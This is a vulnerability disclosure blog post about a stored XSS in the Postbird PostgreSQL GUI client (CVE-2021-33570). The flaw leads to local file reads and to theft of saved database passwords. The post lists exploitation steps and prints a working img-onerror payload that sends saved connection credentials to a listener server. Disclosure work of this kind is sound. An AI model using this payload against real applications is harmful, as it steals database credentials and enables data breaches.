Postbird is a cross-platform PostgreSQL GUI client built on the electron.js framework, widely used by many organizations as well as individuals. On 17th May 2021, a stored XSS vulnerability was discovered by the Tridentsec team in the Postbird application version – 0.8.4.
The vulnerability was very Critical and exploiting the vulnerability can lead to Data Breach. We were able to inject malicious JavaScript into the application, leading us to two other vulnerabilities, Local File Inclusion(LFI) and PostgreSQL Password Stealing.
How this vulnerability can affect your organization?
Every organization maintains its databases which contain classified information about the organization’s infrastructures, business-related information, credentials, client data, etc.
Using this vulnerability, an attacker can fetch all this data to his controlled servers. The attackers can also fetch the database credentials that can be used for persistent connection to the database. Hackers can also steal the files located on the Postbird application user’s computer using the LFI vulnerability.
All these possibilities can create a major threat to an organization’s business reputation and can also lead to more severe cyberattacks.
Vulnerability Exploitation
In order to exploit the vulnerability, we need to inject a malicious JavaScript payload in any table which is present in the PostgreSQL database. When the table loads in the Postbird application the JavaScript code automatically gets executed in the background.
A hacker can save this JavaScript code from a website that saves the raw HTML code into the database and steal the files & PostgreSQL credentials in a real scenario.
You can find our Python Proof-of-Concept code & JavaScript payloads for exploiting the LFI and stealing PostgreSQL on our GitHub Repository.
Run our postbird.py Proof-of-Concept code using command python3 postbird.py before executing any attack.
postbird.py is acting as a fake malicious server deployed by hackers to steal data.
Steps to exploit the vulnerability:
- Open Postbird application.
- Input the payload into any table as data.
- Deploy our postbird.py Proof-of-Concept code using command python3 postbird.py
- Reload the table/application to trigger the vulnerability.
- Check the data received on the postbird.py server.
Payload for PostgreSQL Password stealing
<img src=”” onerror=”var xhttp = new XMLHttpRequest();xhttp.open(‘GET’, ‘http://127.0.0.1 :5555/?credentials=’+window.localStorage.savedConnections, true);xhttp.send();”>
Comment: Embed this video on the blog – Postbird | CVE-2021-33570 | Tridentsec
Conclusion
The source of all 3 vulnerabilities (Stored XSS, LFI & Insecure Data Storage) is JavaScript Injection in the existing code, allowing us to inject different malicious JavaScript in the database and execute it. The vulnerability has been patched by blocking the execution of HTML or JavaScript stored in the database.
Leave a Reply